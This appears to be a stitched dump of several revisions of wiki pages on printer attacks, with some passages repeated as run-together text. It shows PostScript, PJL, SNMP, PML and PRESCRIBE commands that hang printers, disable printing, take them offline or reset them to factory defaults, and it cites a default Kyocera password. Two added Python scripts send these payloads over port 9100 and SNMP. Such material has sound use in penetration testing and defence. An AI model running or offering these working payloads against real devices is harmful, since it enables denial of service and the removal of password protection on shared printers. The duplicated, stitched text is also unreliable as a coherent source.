== PJL == === PJL jobmedia === Proprietary PJL commands <ref>''[http://www.icareasc.com/ICareKM/University/TrainingMaterial/The%20German%20Laserweb/general/software-downloads/paperpathtest%20without%20paper.htm The German Laserweb Vers. 4.0: Test without Paper]'', ATS/GCC Team Germany</ref> can be used to set the older HP devices like the LaserJet 4k series into service mode and completely disable all printing functionality as shown below: @PJL SET SERVICEMODE=HPBOISEID @PJL DEFAULT JOBMEDIA=OFF '''How to test for this attack?''' Use [[PRET]]'s ''disable'' command in ''pjl'' mode: ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> disable Printing functionality: OFF '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. === Offline mode === In addition, the PJL standard defines the ''OPMSG'' command which ‘prompts the printer to display a specified message and go offline’ \cite{hp1997pjl}. This can be used to simulate a paper jam as shown in below: @PJL OPMSG DISPLAY="PAPER JAM IN ALL DOORS" The command is supported by various printer models of different manufacturers. The device can however be easily brought to accept jobs again by manually pressing the ''online'' button on the control panel. '''How to test for this attack?''' Use [[PRET]]'s ''offline'' command in ''pjl'' mode: ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> offline "MESSAGE TO DSIPLAY" Warning: Taking the printer offline will prevent yourself and others from printing or re-connecting to the device. Press CTRL+C to abort. Taking printer offline in... 10 9 8 7 6 5 4 3 2 1 KABOOM! '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. 
---- 9df80d3dada2b91f8738dd511df6454ed8aea289 304 224 2017-01-31T08:07:57Z 84.153.135.37 0 wikitext text/x-wiki

Page description languages that allow infinite loops or calculations requiring a lot of computing time can be abused to keep the printer's [https://en.wikipedia.org/wiki/Raster_image_processor RIP] busy. Examples of this are complex [https://en.wikipedia.org/wiki/HPGL HP-GL] calculations and [[PostScript]] programs. Even minimalist languages like [[PCL]] can be used to upload permanent macros or fonts until the available memory is consumed. [[PJL]] on HP devices has undocumented features to completely disable further printing functionality. In this article, various practical approaches to malicious print jobs which lead to denial of service are discussed.

== PostScript ==

=== Infinite loops ===

One trivial example of an infinite loop written in PostScript is given below:

<syntaxhighlight lang=postscript>
%!
{} loop
</syntaxhighlight>

This minimalist document keeps a PostScript interpreter busy forever. In an evaluation with a pool of 20 test printers, only one had a watchdog mechanism and restarted itself after about 10 minutes. The other devices did not accept print jobs anymore until the test was ultimately interrupted after half an hour. In most cases the malicious print job could be cancelled manually from the control panel, while some devices required a manual restart. In contrast to blocking the [[transmission channel]], the connection can be closed immediately after the PostScript code has been sent; the loop keeps running inside the interpreter without any further involvement of the attacker.

'''How to test for this attack?''' Use [[PRET]]'s ''hang'' command in ''ps'' mode:

 ./pret.py -q printer ps
 Connection to printer established
 Welcome to the pret shell. Type help or ? to list commands.
 printer:/> hang
 Warning: This command causes an infinite loop rendering the device useless until manual restart. Press CTRL+C to abort.
 Executing PostScript infinite loop in... 10 9 8 7 6 5 4 3 2 1 KABOOM!

'''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]].

=== Redefine showpage ===

Another approach is to permanently redefine PostScript operators as described in [[PostScript#Security features|security features]]. By setting ''showpage'' – which is used in every document to actually print the page – to do nothing at all, PostScript jobs are processed but not put to paper anymore. Because ''true 0 startjob'' leaves the encapsulated job (this needs the StartJobPassword, which is 0 unless an administrator has changed it), the redefinition outlives the print job and affects every subsequent document until the interpreter is restarted. Example code is given below:

<syntaxhighlight lang=postscript>
true 0 startjob
/showpage {} def
</syntaxhighlight>

'''How to test for this attack?''' Use [[PRET]]'s ''disable'' command in ''ps'' mode:

 ./pret.py -q printer ps
 Connection to printer established
 Welcome to the pret shell. Type help or ? to list commands.
 printer:/> disable
 Disabling printing functionality

'''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]].

== PJL ==

=== PJL jobmedia ===

Proprietary PJL commands <ref>''[http://www.icareasc.com/ICareKM/University/TrainingMaterial/The%20German%20Laserweb/general/software-downloads/paperpathtest%20without%20paper.htm The German Laserweb Vers. 4.0: Test without Paper]'', ATS/GCC Team Germany</ref> can be used to put older HP devices like the LaserJet 4k series into service mode and completely disable all printing functionality as shown below:

 @PJL SET SERVICEMODE=HPBOISEID
 @PJL DEFAULT JOBMEDIA=OFF

'''How to test for this attack?''' Use [[PRET]]'s ''disable'' command in ''pjl'' mode:

 ./pret.py -q printer pjl
 Connection to printer established
 Welcome to the pret shell. Type help or ? to list commands.
 printer:/> disable
 Printing functionality: OFF

'''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]].

=== Offline mode ===

In addition, the PJL standard defines the ''OPMSG'' command, which ‘prompts the printer to display a specified message and go offline’ <ref>''Printer Job Language Technical Reference Manual'', Hewlett-Packard, 1997</ref>. This can be used to simulate a paper jam as shown below:

 @PJL OPMSG DISPLAY="PAPER JAM IN ALL DOORS"

The command is supported by various printer models of different manufacturers. The device can however easily be brought to accept jobs again by pressing the ''online'' button on the control panel.

'''How to test for this attack?''' Use [[PRET]]'s ''offline'' command in ''pjl'' mode:

 ./pret.py -q printer pjl
 Connection to printer established
 Welcome to the pret shell. Type help or ? to list commands.
 printer:/> offline "MESSAGE TO DISPLAY"
 Warning: Taking the printer offline will prevent yourself and others from printing or re-connecting to the device. Press CTRL+C to abort.
 Taking printer offline in... 10 9 8 7 6 5 4 3 2 1 KABOOM!

'''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]].
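The following Python script is an added example and is neither part of the original page nor PRET code. It shows what PRET's ''hang'', ''disable'' and ''offline'' commands actually put on the wire: the raw port 9100 job with the PJL Universal Exit Language framing, the language switch to PostScript for the two PostScript payloads, and the sanitising of the OPMSG text (a PJL quoted string cannot carry a double quote or control characters). It also parses a ''@PJL INFO STATUS'' reply and sends a trivial PostScript echo job, which is how a tester verifies the effect afterwards (''ONLINE=FALSE'' after OPMSG, no echo while the RIP is stuck in the loop). The host name ''printer'', the status reply used in the comments and the choice of the echo marker are assumptions.

```python
import socket

UEL = b"\x1b%-12345X"          # PJL Universal Exit Language: frames every job
HOST, PORT = "printer", 9100    # assumed target, as in the PRET examples above


def pjl_string(text):
    """Reduce a message to what a PJL quoted string may carry: printable
    ASCII without the double quote that would terminate the string."""
    return "".join(c for c in text if 32 <= ord(c) < 127 and c != '"')


def build_job(body, language=None):
    """Frame a payload in UEL; optionally switch the parser to a PDL first."""
    job = UEL
    if language:
        job += b"@PJL ENTER LANGUAGE=" + language.encode("ascii") + b"\r\n"
    job += body
    if not body.endswith(b"\n"):
        job += b"\n"
    return job + UEL


# --- the three DoS payloads discussed on this page ---

def ps_infinite_loop():
    return build_job(b"%!\n{} loop\n", "POSTSCRIPT")


def ps_disable_showpage():
    # 'true 0 startjob' leaves the encapsulated job, so the redefinition persists
    return build_job(b"%!\ntrue 0 startjob\n/showpage {} def\n", "POSTSCRIPT")


def pjl_offline(message):
    return build_job(b'@PJL OPMSG DISPLAY="' + pjl_string(message).encode("ascii") + b'"\r\n')


# --- checking the effect ---

def parse_pjl_status(reply):
    """Parse a '@PJL INFO STATUS' reply (KEY=VALUE lines, form feed at the end)
    into a dict: CODE as int, ONLINE as bool, quoted DISPLAY as str."""
    result = {}
    for line in reply.decode("latin-1").splitlines():
        line = line.strip("\x0c \r")
        if not line or line.startswith("@PJL") or "=" not in line:
            continue
        key, value = line.split("=", 1)
        if value.startswith('"') and value.endswith('"'):
            result[key] = value[1:-1]
        elif value in ("TRUE", "FALSE"):
            result[key] = value == "TRUE"
        elif value.lstrip("-").isdigit():
            result[key] = int(value)
        else:
            result[key] = value
    return result


def send_job(payload, host=HOST, port=PORT, timeout=10, until=None):
    """Send a raw job over port 9100; if 'until' is given, collect the reply
    until that marker appears or the socket times out."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(payload)
        if until is None:
            return b""
        reply = b""
        try:
            while until not in reply:
                data = s.recv(4096)
                if not data:
                    break
                reply += data
        except socket.timeout:
            pass
        return reply


def device_status(host=HOST):
    """Ask the PJL parser for its status; OPMSG shows up as ONLINE=FALSE."""
    reply = send_job(UEL + b"@PJL INFO STATUS\r\n" + UEL, host, until=b"\x0c")
    return parse_pjl_status(reply)


def rip_alive(host=HOST, timeout=10):
    """Echo a marker through the PostScript interpreter; no echo within the
    timeout means the RIP is busy (e.g. stuck in '{} loop') or offline."""
    job = build_job(b"%!\n(ALIVE) print flush\n", "POSTSCRIPT")
    return b"ALIVE" in send_job(job, host, timeout=timeout, until=b"ALIVE")


if __name__ == "__main__":
    print("before:", device_status(), "rip alive:", rip_alive())
    send_job(pjl_offline("PAPER JAM IN ALL DOORS"))
    print("after: ", device_status())
```

Run it against a lab device only: the ''offline'' and ''hang'' payloads block printing for everyone, and ''rip_alive()'' will itself sit in the device's input queue behind a looping job, so use a short timeout.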
---- 5fe310455daf415663129dfbaa8879cdbba23f71 Factory defaults 0 32 633 632 2017-06-25T11:29:36Z Admin 1 /* PostScript */ wikitext text/x-wiki

Resetting a device to factory defaults is security-critical functionality, as it overwrites protection mechanisms like user-set passwords. This can usually be done by pressing a special key combination on the printer's control panel. Performing such a cold reset only takes seconds and is therefore a realistic scenario for local attackers or penetration testers, who can for example sneak into the copy room at lunchtime. However, physical access to the device is not always an option. The question arises whether printer vendors have implemented the possibility to perform factory resets remotely using printer control or page description languages. They have, as discussed in this article.

== SNMP ==

The Printer-MIB <ref>''[https://www.ietf.org/rfc/rfc3805.txt RFC3805: Printer MIB v2]'', R. Bergman, I. McDonald and H. Lewis, 2004</ref> defines the ''prtGeneralReset'' object (OID 1.3.6.1.2.1.43.5.1.1.3.1), which allows an attacker to restart the device (''powerCycleReset(4)''), reset the NVRAM settings (''resetToNVRAM(5)'') or restore factory defaults (''resetToFactoryDefaults(6)'') using [[SNMP]]. This feature/attack is supported by a large variety of printers and removes all protection mechanisms like user-set passwords for the embedded web server. All it takes is a single SNMP SET request with a community string that has write access; the example below uses the default ''public''.

While protection mechanisms can be efficiently bypassed this way, a practical drawback of the approach is that any static IP address configuration is lost as well. If no [https://de.wikipedia.org/wiki/Dynamic_Host_Configuration_Protocol DHCP] service is available, the attacker will not be able to reconnect to the device after resetting it to factory defaults.

'''How to test for this attack?''' Resetting the device to factory defaults can be accomplished using the ''snmpset'' command as shown below:

<syntaxhighlight lang=sh>
snmpset -v1 -c public printer 1.3.6.1.2.1.43.5.1.1.3.1 i 6
</syntaxhighlight>

'''Who can perform this attack?''' Anyone who can send network packets to port 161/udp of the printer device.

== PML/PJL ==

In many scenarios an attacker does not have the capability to perform SNMP requests because of firewalls or unknown SNMP community strings. On HP devices, however, the SNMP request can be translated into its [[PML]] representation and embedded within a legitimate print job. This allows an attacker to restart and/or reset the device to factory defaults from within ordinary print jobs as shown below (the trailing ''06'' is the same ''resetToFactoryDefaults(6)'' value as in the SNMP request above):

 @PJL DMCMD ASCIIHEX="040006020501010301040106"

'''How to test for this attack?''' On HP printers, restarting or resetting the device can easily be reproduced using [[PRET]]:

 ./pret.py -q printer pjl
 Connection to printer established
 Welcome to the pret shell. Type help or ? to list commands.
 printer:/> reset
 printer:/> restart

'''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]].
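The two sections above are the same ''prtGeneralReset'' SET in two encodings. The Python below is an added example, not code from this page or from PRET: it hand-encodes the SNMPv1 ''SetRequest'' that ''snmpset -v1 -c public printer 1.3.6.1.2.1.43.5.1.1.3.1 i 6'' sends (BER as in RFC 1157), and builds the PML request for the same OID and value so that it reproduces the ''DMCMD'' hex string shown above. The PML framing (command byte ''04'', type code in the upper six bits of the type byte followed by one length byte, and the prefix byte ''02'' standing for the printer-MIB root ''1.3.6.1.2.1.43'') is an interpretation reconstructed from that string and is labelled as an assumption in the code; the generalisation to other arcs and values goes beyond what the page shows. The host name ''printer'' is assumed.

```python
import socket

PRT_GENERAL_RESET = "1.3.6.1.2.1.43.5.1.1.3.1"     # prtGeneralReset (RFC 3805)
POWER_CYCLE_RESET, RESET_TO_NVRAM, RESET_TO_FACTORY_DEFAULTS = 4, 5, 6
UEL = b"\x1b%-12345X"                                # PJL Universal Exit Language


# --- SNMPv1 SetRequest, hand-encoded in BER (what 'snmpset -v1 ... i 6' emits) ---

def ber_len(n):
    """Definite-form length: short form below 128, long form above."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def tlv(tag, content):
    return bytes([tag]) + ber_len(len(content)) + content


def ber_int(value):
    """INTEGER, two's complement, minimal length (enough for ids and enums)."""
    length = max(1, (value.bit_length() + 8) // 8)
    return tlv(0x02, value.to_bytes(length, "big", signed=True))


def ber_oid(dotted):
    """OBJECT IDENTIFIER: first two arcs packed into one byte, the rest base-128."""
    arcs = [int(a) for a in dotted.split(".")]
    out = [40 * arcs[0] + arcs[1]]
    for arc in arcs[2:]:
        chunk = [arc & 0x7F]
        arc >>= 7
        while arc:
            chunk.append(0x80 | (arc & 0x7F))
            arc >>= 7
        out.extend(reversed(chunk))
    return tlv(0x06, bytes(out))


def snmp_set_request(oid, value, community="public", request_id=1):
    """Message ::= SEQUENCE { version INTEGER(0), community OCTET STRING, SetRequest [3] }"""
    varbind = tlv(0x30, ber_oid(oid) + ber_int(value))
    pdu = tlv(0xA3, ber_int(request_id) + ber_int(0) + ber_int(0) + tlv(0x30, varbind))
    return tlv(0x30, ber_int(0) + tlv(0x04, community.encode("ascii")) + pdu)


# --- the same SET as PML inside a PJL job (HP devices) ---
# ASSUMPTION: framing reconstructed from the DMCMD string on this page:
# command byte, then OID and value each as <type<<2><length><data>, with a
# one-byte prefix replacing the printer-MIB root 1.3.6.1.2.1.43 in the OID.

PML_SET_REQUEST = 0x04
PML_OID_PREFIXES = {"1.3.6.1.2.1.43": 0x02}
PML_TYPE_OID, PML_TYPE_ENUM = 0x00, 0x01


def pml_value(pml_type, data):
    return bytes([pml_type << 2, len(data)]) + data


def pml_oid(dotted):
    for prefix, byte in PML_OID_PREFIXES.items():
        if dotted.startswith(prefix + "."):
            rest = [int(a) for a in dotted[len(prefix) + 1:].split(".")]
            return pml_value(PML_TYPE_OID, bytes([byte] + rest))
    raise ValueError("no PML prefix known for " + dotted)


def pml_set_enum(oid, value):
    return bytes([PML_SET_REQUEST]) + pml_oid(oid) + pml_value(PML_TYPE_ENUM, bytes([value]))


def pjl_dmcmd(pml_request):
    """Wrap a PML request in the PJL command that carries it inside a print job."""
    return b'@PJL DMCMD ASCIIHEX="' + pml_request.hex().upper().encode("ascii") + b'"\r\n'


# --- delivery (network; not exercised offline) ---

def send_snmp_set(host, oid, value, community="public", timeout=3):
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(snmp_set_request(oid, value, community), (host, 161))
        return s.recv(1500)            # SetResponse, or socket.timeout


def send_pjl_job(host, body, port=9100, timeout=3):
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(UEL + body + UEL)


if __name__ == "__main__":
    print(snmp_set_request(PRT_GENERAL_RESET, RESET_TO_FACTORY_DEFAULTS).hex())
    print(pjl_dmcmd(pml_set_enum(PRT_GENERAL_RESET, POWER_CYCLE_RESET)))
    # send_pjl_job("printer", pjl_dmcmd(pml_set_enum(PRT_GENERAL_RESET, POWER_CYCLE_RESET)))
```

The restart variant differs from the reset only in the last byte (''04'' for ''powerCycleReset'' instead of ''06''), which is also why the same check applies to both: a device that accepts the PJL job but has SNMP filtered is still fully exposed to this attack, and the only effective countermeasure is restricting who can print at all.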
== PostScript ==

PostScript offers a similar feature: the ''FactoryDefaults'' system parameter, ‘a flag that, if set to true immediately before the printer is turned off, causes all nonvolatile parameters to revert to their factory default values at the next power-on’ <ref>''[https://www.adobe.com/products/postscript/pdfs/PLRM.pdf PostScript Language Reference Manual, 3rd Edition]'', Adobe Systems Inc., 1999, p. 751</ref>. Restarting the printer, on the other hand, can be accomplished via SNMP or PML as described above. It must be noted that PostScript itself also has the capability to restart its environment, but this requires a [[Credential disclosure|valid password]]. The PostScript interpreter can however be put into an infinite loop as discussed in [[document processing]] DoS attacks, which forces the user to restart the device manually; after that restart the nonvolatile parameters, including the PostScript password, have reverted to their factory defaults.

Reset PostScript system parameters to factory defaults:

<syntaxhighlight lang=postscript>
<< /FactoryDefaults true >> setsystemparams
</syntaxhighlight>

Restart the PostScript interpreter and virtual memory:

<syntaxhighlight lang=postscript>
true 0 startjob
systemdict /quit get exec
</syntaxhighlight>

'''How to test for this attack?''' Restarting or resetting a printer's PostScript interpreter can easily be reproduced using [[PRET]]:

 ./pret.py -q printer ps
 Connection to printer established
 Welcome to the pret shell. Type help or ? to list commands.
 printer:/> reset
 printer:/> restart

'''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]].

== PRESCRIBE ==

For Kyocera devices, the PRESCRIBE page description language may be used to reset the device to factory defaults from within ordinary print jobs, using one of the commands shown below:

<!-- may authorize first, using default machine passwords: !R! ACNT "ADMN", "5200"; -->
 !R! KSUS "AUIO", "CUSTOM:Admin Password = 'admin00'"; CMMT "Drop the security level, reset password";
 !R! ACNT "REST"; CMMT "Reset account code admin password";
 !R! EGRE; CMMT "Reset the engine board to factory defaults";
 !R! SIOP0,"RESET:0"; CMMT "Reset configuration settings";

'''How to test for this attack?''' Open a raw network connection (using ''netcat'' <ref>''[http://nc110.sourceforge.net/ Netcat – TCP/IP Swiss Army Knife]'', Hobbit, 1996</ref>, for example) to port 9100/tcp of the printer and send the commands documented above.

'''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]].
== PostScript == PostScript offers a similar feature: The ''FactoryDefaults'' system parameter, ‘a flag that, if set to true immediately before the printer is turned off, causes all nonvolatile parameters to revert to their factory default values at the next power-on’ <ref>''[https://www.adobe.com/products/postscript/pdfs/PLRM.pdf PostScript Language Reference Manual, 3rd Edition]'', Adobe Systems Inc., 1999, p. 751</ref>. Restarting the printer on the other hand can be accomplished by SNMP and PML as described above. It must be noted that PostScript itself also has the capability to restart its environment but it requires a [[Credential disclosure|valid password]]. The PostScript interpreter however can be put into an infinite loop as discussed in [[eval-transmission-channel]] which forces the user to manually restart the device and thus reset the PostScript password. Reset PostScript system parameters to factory defaults: <syntaxhighlight lang=postscript> << /FactoryDefaults true >> setsystemparams </syntaxhighlight> Restart the PostScript interpreter and virtual memory: <syntaxhighlight lang=postscript> true 0 startjob systemdict /quit get exec </syntaxhighlight> '''How to test for this attack?''' Restarting or resetting a printer's PostScript interpreter can easily be reproduced using [[PRET]]: ./pret.py -q printer ps Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> reset printer:/> restart '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. == PRESCRIBE == For Kyocera devices, the PRESCRIBE page description languages may be used to reset the device to factory default from within ordinary print jobs using one of the commands shown below: <!-- may autorize first, using default machine passwords: !R! ACNT "ADMN", "5200"; --> !R! 
KSUS "AUIO", "CUSTOM:Admin Password = 'admin00'"; CMMT "Drop the security level, reset password"; !R! ACNT "REST"; CMMT "Reset account code admin password"; !R! EGRE; CMMT "Reset the engine board to factory defaults"; !R! SIOP0,"RESET:0"; CMMT "Reset configuration settings"; '''How to test for this attack?''' Open a raw network connection (using ''netcat'' <ref>''[http://nc110.sourceforge.net/ Netcat – TCP/IP Swiss Army Knife]'', Hobbit, 1996</ref>, for example) to port 9100/tcp of the printer and send the commands documented above. '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. ---- d18abca288379f54186dfb5885d169f19790a983 176 167 2017-01-21T11:45:04Z Admin 1 wikitext text/x-wiki Resetting a device to factory defaults is a security-critical functionality as it overwrites protection mechanisms like user-set passwords. This can usually be done by pressing a special key combination on the printer's control panel. Performing such a cold reset only takes seconds and therefore is a realistic scenario for local attackers or penetration testers, who can for example sneak into the copy room at lunchtime. However, physical access to the device is not always an option. The question comes up, if printer vendors have implemented the possibility to perform factory resets on-line using printer control or page description languages. They have, as discussed in this article. == SNMP == The Printer-MIB <ref>''[https://www.ietf.org/rfc/rfc3805.txt RFC3805: Printer MIB v2]'', R. Bergman, I. McDonald and H. Lewis, 2004</ref> defines the ''prtGeneralReset'' Object (OID 1.3.6.1.2.1.43.5.1.1.3.1) which allows an attacker to restart the device (''powerCycleReset(4)''), reset the NVRAM settings (''resetToNVRAM(5)'') or restore factory defaults (''resetToFactoryDefaults(6)'') using [[SNMP]]. 
This feature/attack is supported by a large variety of printers and removes all protection mechanisms like user-set passwords for the embedded web server. While protection mechanisms can be efficiently bypassed, a practical drawback of this approach is that all static IP address configuration will be lost. If no [[DHCP]] service is available, the attacker will not be able to reconnect to the device anymore after resetting it to factory defaults. '''How to test for this attack?''' Resetting the device to factory default can be accomplished using ''snmpset'' command as shown below: <syntaxhighlight lang=sh> snmpset -v1 -c public printer 1.3.6.1.2.1.43.5.1.1.3.1 i 6 </syntaxhighlight> '''Who can perform this attack?''' Anyone who can send network packets to port 161/udp of the printer device. == PML/PJL == In many scenarios an attacker does not have the capabilities to perform SNMP requests because of firewalls or unknown SNMP community strings. On HP devices however, SNMP can be transformed into its [[PML]] representation and embed the request within a legitimate print job. This allows an attacker to restart and/or reset the device to factory defaults within ordinary print jobs as shown below: @PJL DMCMD ASCIIHEX="040006020501010301040106" '''How to test for this attack?''' On HP printers, restarting or resetting the device can easily be reproduced using [[PRET]]: ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> reset printer:/> restart '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. 
== PostScript == PostScript offers a similar feature: The ''FactoryDefaults'' system parameter, ‘a flag that, if set to true immediately before the printer is turned off, causes all nonvolatile parameters to revert to their factory default values at the next power-on’ <ref>''[https://www.adobe.com/products/postscript/pdfs/PLRM.pdf PostScript Language Reference Manual, 3rd Edition]'', Adobe Systems Inc., 1999, p. 751</ref>. Restarting the printer on the other hand can be accomplished by SNMP and PML as described above. It must be noted that PostScript itself also has the capability to restart its environment but it requires a [[Credential disclosure|valid password]]. The PostScript interpreter however can be put into an infinite loop as discussed in [[eval-transmission-channel]] which forces the user to manually restart the device and thus reset the PostScript password. Reset PostScript system parameters to factory defaults: <syntaxhighlight lang=postscript> << /FactoryDefaults true >> setsystemparams </syntaxhighlight> Restart the PostScript interpreter and virtual memory: <syntaxhighlight lang=postscript> true 0 startjob systemdict /quit get exec </syntaxhighlight> '''How to test for this attack?''' Restarting or resetting a printer's PostScript interpreter can easily be reproduced using [[PRET]]: ./pret.py -q printer ps Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> reset printer:/> restart '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. == PRESCRIBE == For Kyocera devices, the PRESCRIBE page description languages may be used to reset the device to factory default from within ordinary print jobs using one of the commands shown below: <!-- may autorize first, using default machine passwords: !R! ACNT "ADMN", "5200"; --> !R! 
KSUS "AUIO", "CUSTOM:Admin Password = 'admin00'"; CMMT "Drop the security level, reset password"; !R! ACNT "REST"; CMMT "Reset account code admin password"; !R! EGRE; CMMT "Reset the engine board to factory defaults"; !R! SIOP0,"RESET:0"; CMMT "Reset configuration settings"; '''How to test for this attack?''' Open a raw network connection (using ''netcat'' <ref>''[http://nc110.sourceforge.net/ Netcat – TCP/IP Swiss Army Knife]'', Hobbit, 1996</ref>, for example) to port 9100/tcp of the printer and send the commands documented above. '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. ---- 9d73e3562ffd8777b7a399ef9918579cbdbb57c6 167 166 2017-01-20T16:05:12Z Admin 1 /* PRESCRIBE */ wikitext text/x-wiki Resetting a device to factory defaults is a security-critical functionality as it overwrites protection mechanisms like user-set passwords. This can usually be done by pressing a special key combination on the printer's control panel. Performing such a cold reset only takes seconds and therefore is a realistic scenario for local attackers or penetration testers, who can for example sneak into the copy room at lunchtime. However, physical access to the device is not always an option. The question comes up, if printer vendors have implemented the possibility to perform factory resets on-line using printer control or page description languages. They have, as discussed in this article. == SNMP == The Printer-MIB <ref>''[https://www.ietf.org/rfc/rfc3805.txt RFC3805: Printer MIB v2]'', R. Bergman, I. McDonald and H. Lewis, 2004</ref> defines the ''prtGeneralReset'' Object (OID 1.3.6.1.2.1.43.5.1.1.3.1) which allows an attacker to restart the device (''powerCycleReset(4)''), reset the NVRAM settings (''resetToNVRAM(5)'') or restore factory defaults (''resetToFactoryDefaults(6)'') using [[SNMP]]. 
This feature/attack is supported by a large variety of printers and removes all protection mechanisms like user-set passwords for the embedded web server. While protection mechanisms can be efficiently bypassed, a practical drawback of this approach is that all static IP address configuration will be lost. If no [[DHCP]] service is available, the attacker will not be able to reconnect to the device anymore after resetting it to factory defaults. '''How to test for this attack?''' Resetting the device to factory default can be accomplished using ''snmpset'' command as shown below: $ snmpset -v1 -c public printer 1.3.6.1.2.1.43.5.1.1.3.1 i 6 '''Who can perform this attack?''' Anyone who can send network packets to port 161/udp of the printer device. == PML/PJL == In many scenarios an attacker does not have the capabilities to perform SNMP requests because of firewalls or unknown SNMP community strings. On HP devices however, SNMP can be transformed into its [[PML]] representation and embed the request within a legitimate print job. This allows an attacker to restart and/or reset the device to factory defaults within ordinary print jobs as shown below: @PJL DMCMD ASCIIHEX="040006020501010301040106" '''How to test for this attack?''' On HP printers, restarting or resetting the device can easily be reproduced using [[PRET]]: ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> reset printer:/> restart '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. 
== PostScript == PostScript offers a similar feature: The ''FactoryDefaults'' system parameter, ‘a flag that, if set to true immediately before the printer is turned off, causes all nonvolatile parameters to revert to their factory default values at the next power-on’ <ref>''[https://www.adobe.com/products/postscript/pdfs/PLRM.pdf PostScript Language Reference Manual, 3rd Edition]'', Adobe Systems Inc., 1999, p. 751</ref>. Restarting the printer on the other hand can be accomplished by SNMP and PML as described above. It must be noted that PostScript itself also has the capability to restart its environment but it requires a [[Credential disclosure|valid password]]. The PostScript interpreter however can be put into an infinite loop as discussed in [[eval-transmission-channel]] which forces the user to manually restart the device and thus reset the PostScript password. Reset PostScript system parameters to factory defaults: <syntaxhighlight lang=postscript> << /FactoryDefaults true >> setsystemparams </syntaxhighlight> Restart the PostScript interpreter and virtual memory: <syntaxhighlight lang=postscript> true 0 startjob systemdict /quit get exec </syntaxhighlight> '''How to test for this attack?''' Restarting or resetting a printer's PostScript interpreter can easily be reproduced using [[PRET]]: ./pret.py -q printer ps Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> reset printer:/> restart '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. == PRESCRIBE == For Kyocera devices, the PRESCRIBE page description languages may be used to reset the device to factory default from within ordinary print jobs using one of the commands shown below: <!-- may autorize first, using default machine passwords: !R! ACNT "ADMN", "5200"; --> !R! 
KSUS "AUIO", "CUSTOM:Admin Password = 'admin00'"; CMMT "Drop the security level, reset password"; !R! ACNT "REST"; CMMT "Reset account code admin password"; !R! EGRE; CMMT "Reset the engine board to factory defaults"; !R! SIOP0,"RESET:0"; CMMT "Reset configuration settings"; '''How to test for this attack?''' Open a raw network connection (using ''netcat'' <ref>''[http://nc110.sourceforge.net/ Netcat – TCP/IP Swiss Army Knife]'', Hobbit, 1996</ref>, for example) to port 9100/tcp of the printer and send the commands documented above. '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. ---- 791864a4188358cb5b0fa2dc7538bd2ef6b19ac4 166 142 2017-01-20T16:04:37Z Admin 1 wikitext text/x-wiki Resetting a device to factory defaults is a security-critical functionality as it overwrites protection mechanisms like user-set passwords. This can usually be done by pressing a special key combination on the printer's control panel. Performing such a cold reset only takes seconds and therefore is a realistic scenario for local attackers or penetration testers, who can for example sneak into the copy room at lunchtime. However, physical access to the device is not always an option. The question comes up, if printer vendors have implemented the possibility to perform factory resets on-line using printer control or page description languages. They have, as discussed in this article. == SNMP == The Printer-MIB <ref>''[https://www.ietf.org/rfc/rfc3805.txt RFC3805: Printer MIB v2]'', R. Bergman, I. McDonald and H. Lewis, 2004</ref> defines the ''prtGeneralReset'' Object (OID 1.3.6.1.2.1.43.5.1.1.3.1) which allows an attacker to restart the device (''powerCycleReset(4)''), reset the NVRAM settings (''resetToNVRAM(5)'') or restore factory defaults (''resetToFactoryDefaults(6)'') using [[SNMP]]. 
